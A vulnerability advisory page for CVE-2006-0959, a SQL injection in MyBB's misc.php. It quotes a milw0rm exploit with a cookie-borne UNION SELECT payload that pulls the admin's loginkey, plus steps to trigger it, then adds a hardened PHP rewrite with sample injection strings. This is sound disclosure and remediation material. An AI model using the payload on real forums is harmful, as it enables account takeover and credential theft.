MyBulletinBoard 'misc.php' SQL Injection Vulnerability

Vulnerability ID 1109836 Vulnerability type SQL injection
Published 2006-02-28 Updated 2006-10-05
CVE ID CVE-2006-0959 CNNVD ID CNNVD-200603-004
Platform PHP CVSS score 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/1539
https://cxsecurity.com/issue/WLB-2006030013
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-004
|Vulnerability details
misc.php in MyBulletinBoard (MyBB) 1.03 contains a SQL injection vulnerability. When register_globals is enabled, a remote attacker can execute arbitrary SQL commands by setting the comma variable through a comma parameter in a cookie. Note: version 1.04 has also been reported as affected.
|Vulnerability EXP
MyBB New SQL Injection

D3vil-0x1 < Devil-00 >

Milw0rm ID :-
http://www.milw0rm.com/auth.php?id=1320

The Inf.File :-
misc.php

Linez :-

[code]
	$buddies = $mybb->user['buddylist'];
	$namesarray = explode(",",$buddies);
	if(is_array($namesarray))
	{
		while(list($key, $buddyid) = each($namesarray))
		{
			$sql .= "$comma'$buddyid'"; // <== HERE :) Uncleared var !! ($sql and $comma are never initialised before use)
			$comma = ",";
		}
	}
	$timecut = time() - $mybb->settings['wolcutoff'];
	$query = $db->query("SELECT u.*, g.canusepms FROM ".TABLE_PREFIX."users u LEFT JOIN ".TABLE_PREFIX."usergroups g ON (g.gid=u.usergroup) WHERE u.uid IN ($sql)");
[/code]

From 255 to 265

The GLOBALS unset function .. does not unset $_COOKIES ..
then u can start attacking any var by cookies :)

Tested on MyBB 1.3 .. register_globals = On

Explorer Exploit :-

1- Login by any username ..
2- Create new cookie (
	name 	=> "comma"
	value	=> "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=1/*")

3- Check The URL :-
HOST/PATH/misc.php?action=buddypopup

Where HOST = The Vic.Server And PATH = MyBB Dir.

# milw0rm.com [2006-02-28]
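The root cause quoted above is that `$sql` and `$comma` are read before they are ever assigned, so with register_globals=On any request variable or cookie of the same name seeds the string that lands inside `WHERE u.uid IN (...)`. The following PHP is an added example written for this page, not MyBB's own code or patch: it places the quoted loop beside a hardened rewrite that starts from empty locals and admits only positive integer IDs, so neither an injected `$comma` nor a tampered buddy list can alter the query. The function names, the sample buddy lists and the shortened cookie value are all constructed for the illustration.

```php
<?php
// Added example (not MyBB's own code): the buddy-list loop from misc.php next
// to a hardened version. Function names below are hypothetical.
declare(strict_types=1);

/**
 * Vulnerable pattern as quoted in the advisory. $comma and $sql are given
 * defaults here only so the function is callable; in the original they are
 * simply uninitialised, which is exactly what register_globals exploits.
 */
function build_in_list_vulnerable(string $buddies, string $comma = '', string $sql = ''): string
{
    $namesarray = explode(',', $buddies);
    foreach ($namesarray as $buddyid) {
        $sql .= "$comma'$buddyid'";   // attacker-controlled prefix and unquoted-unsafe value
        $comma = ',';
    }
    return $sql;
}

/**
 * Hardened version:
 *  - every local starts from an explicit empty value, so a same-named
 *    request variable or cookie can never act as the initial state;
 *  - each entry must be a bare string of digits (no quotes, operators or
 *    comments can survive the check), then is cast to int;
 *  - returns null when nothing valid remains so the caller skips the query
 *    rather than emitting "IN ()", which MySQL rejects.
 */
function build_in_list_hardened(string $buddies): ?string
{
    $ids = [];
    foreach (explode(',', $buddies) as $buddyid) {
        $buddyid = trim($buddyid);
        if ($buddyid !== '' && preg_match('/^\d{1,10}$/', $buddyid) === 1) {
            $ids[] = (int) $buddyid;
        }
    }
    $ids = array_values(array_unique($ids));
    return $ids === [] ? null : implode(',', $ids);
}

// Constructed sample data: a benign stored buddy list, a tampered one, and a
// shortened form of the cookie-supplied $comma value from the advisory.
$benign        = '3,17,42';
$tampered      = "3,17') OR 1=1/*";
$injectedComma = '0) OR 1=1/*';

echo "vulnerable, clean input:    ", build_in_list_vulnerable($benign), "\n";
echo "vulnerable, injected comma: ", build_in_list_vulnerable($benign, $injectedComma), "\n";
echo "hardened, clean input:      ", var_export(build_in_list_hardened($benign), true), "\n";
echo "hardened, tampered list:    ", var_export(build_in_list_hardened($tampered), true), "\n";

// In the page's own query the hardened value would be used as:
//   $in = build_in_list_hardened($mybb->user['buddylist']);
//   if ($in !== null) { $query = $db->query("... WHERE u.uid IN ($in)"); }
```

Run it with `php example.php`: the vulnerable function echoes the injected `$comma` straight into its output, while the hardened one yields `'3,17,42'` for the clean list and only `'3'` for the tampered list, because the entry `17') OR 1=1/*` fails the digits-only check and is dropped. Initialising the locals is the part that neutralises register_globals; the integer check is what makes the interpolated list safe regardless of how the stored buddy list was produced.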
|References

Source: XF
Name: mybb-misc-sql-injection(24953)
Link: http://xforce.iss.net/xforce/xfdb/24953
Source: BID
Name: 16631
Link: http://www.securityfocus.com/bid/16631
Source: BUGTRAQ
Name: 20060303 MyBB 1.04 Perl Exploit
Link: http://www.securityfocus.com/archive/1/archive/1/426653/100/0/threaded
Source: BUGTRAQ
Name: 20060228 MyBB 1.3 New SQL Injection
Link: http://www.securityfocus.com/archive/1/archive/1/426320/100/0/threaded
Source: OSVDB
Name: 23554
Link: http://www.osvdb.org/23554
Source: VUPEN
Name: ADV-2006-0774
Link: http://www.frsirt.com/english/advisories/2006/0774
Source: SECUNIA
Name: 19061
Link: http://secunia.com/advisories/19061
Source: SREASON
Name: 512
Link: http://securityreason.com/securityalert/512
Source: MILW0RM
Name: 1539
Link: http://milw0rm.com/exploits/1539